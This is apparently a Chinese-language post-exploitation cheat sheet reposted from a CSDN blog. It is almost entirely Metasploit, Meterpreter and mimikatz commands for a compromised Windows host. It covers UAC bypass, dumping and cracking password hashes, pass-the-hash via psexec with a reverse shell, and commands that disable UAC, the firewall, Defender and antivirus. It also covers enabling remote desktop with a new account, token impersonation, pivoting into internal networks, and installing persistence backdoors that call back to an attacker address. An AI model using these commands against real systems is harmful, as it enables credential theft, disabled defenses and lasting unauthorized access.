后渗透流程
权限提升
绕过UAC
msf模块
- Exploit/windows/local/bypassuac
- Exploit/windows/local/bypassuac_injection
- Exploit/windows/local/bypassuac_vbs
系统提权
提高程序运行级别
- msf模块(Exploit/windows/local/ask)
缺点:需要uac交互
后渗透信息收集
msf模块(post)
-
获取目标主机的分区情况:
post/windows/gather/forensics/enum_drives
-
判断是否为虚拟机:
post/windows/gather/checkvm
-
开启了哪些服务:
post/windows/gather/enum_applications
-
查看共享:
post/windows/gather/enum_shares
-
获取主机最近的系统操作:
post/windows/gather/dumplinks
-
查看补丁:
post/windows/gather/enum_applications
enum_patches -
scraper
脚本
路径:/usr/share/metasploit-framework/scripts/meterpreter
(
meterpreter下run scraper
)
保存信息的目录:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx
winenum
脚本(meterpreter下run winenum)
数据包抓获
目的:抓获与外围的交互
使用地点:找不到进入内网的方法(主机在防火墙,开放端口少,是服务器的子网)
抓包
sniffer会过滤掉自身merterpreter产生的流量,直接去抓取和主机相关的数据包信息
- 加载sniffer:
load sniffer
- 查看网卡信息;
sniffer_interfaces
- 开启监听:
sniffer_start 1
- 导出数据包:
sniffer_dump 1 1.cap
解包
- auxiliary/sniffer/psnuffle
meterpreter模块
- run packetrecorder
- run post/windows/manage/rpcapd_start
抓hash
基础:密码格式:
用户名称:RID:LM-HASH值:NT-HASH值
###获取hash值
hashdump
run post/windows/gather/smart_hashdump
- 检查权限和系统类型
- 检查是否是域控制服务器
- 从注册表读取hash,注入lsass进程
- 如果是08server并且具有管理员权限,直接getsystem尝试提权
- 如果是win7且UAC关闭并具有管理员权限,从注册表读取
- 03/XP直接getsystem,从注册表读取hash
- mimikatz(已集合到mimikatz)
- 需要administrator及以上权限,需要免杀
privilege::debug
#查看权限sekurlsa::logonpasswords
#获取hash和明文密码(如果可以的话)sekurlsa::ekeys
#获取kerberos加密凭证
hash破解
- Hashcat
文章:
(https://www.anquanke.com/post/id/177123)
hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force
hash传递攻击
UAC注册表:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
进shell,中文乱码,输入chcp 65001
shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- MSF
- exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128
set RHOST 192.168.206.101
set SMBUser administrator
set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0
exploit
- mimikkatz
sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
关闭防火墙及杀毒软件
-关闭防火墙(shell)
- Netsh advfirewall set allprofiles state off(管理员及以上权限)
- 关闭Denfender(shell)
- Net stop windefend
- 关闭DEP(shell)
- Bcdedit.exe /set {current} nx AlwaysOff
- 关闭杀毒软件(meterpreter)
- Run killav
- Run post/windows/manage/killava
远程桌面
- 开启远程桌面
run post/windows/manage/enable_rdp
(方式一)run getgui -e
(方式二)
run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt
(关闭远程桌面)
- 开启远程桌面并添加新用户
run getgui -u root -p pass
开启远程桌面并绑定在8888端口
- `run getgui -e -f 8888`
- 截图
load espia
screengrab
- 远程桌面连接
kali下:rdesktop -u root -p 123 192.168.85.157
令牌假冒
-
windows安全相关概念
- session
- Windows Station
- Desktop
- Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限
-
incognito
- load incognito
- list_tokens -u
(非交互的token多出来一条EA\Administrator
) - impersonate_token EA\Administrator
- 成功登陆
跳板攻击
- pivoting
- 利用已经被入侵的主机作为跳板来攻击网络中其他系统
- 访问由于路由问题而不能直接访问的内网系统
- 添加路由
- 方式一:run autoroute -s 192.168.102.0/24
- 方式二:run post/multi/manage/autoroute(更新)
- 利用win7攻击内网服务器
- 扫描内网网络
- run post/windows/gather/arp_scanner rhosts=192.168.102.0/24
- use auxiliary/scanner/portscan/tcp
ProxyChains代理设置
- 配置:vim /etc/proxychain.conf(加上ip)
- Socket代理
auxiliary/server/socks4a
- ProxyChains
- ProxyChains是为GUN\Linux操作系统而开发的工具,任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。
- proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx
后门植入
- meterpreter后门: Metsvc
- 通过服务启动
- run metsvc -A #设定端口,上传后门文件
- meterpreter后门:persistence
- 通过启动型启动
- 特性:定期会连,系统启动时回连,自动运行
- run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111
来源:CSDN
作者:FFM-G
链接:https://blog.csdn.net/weixin_44255856/article/details/103464504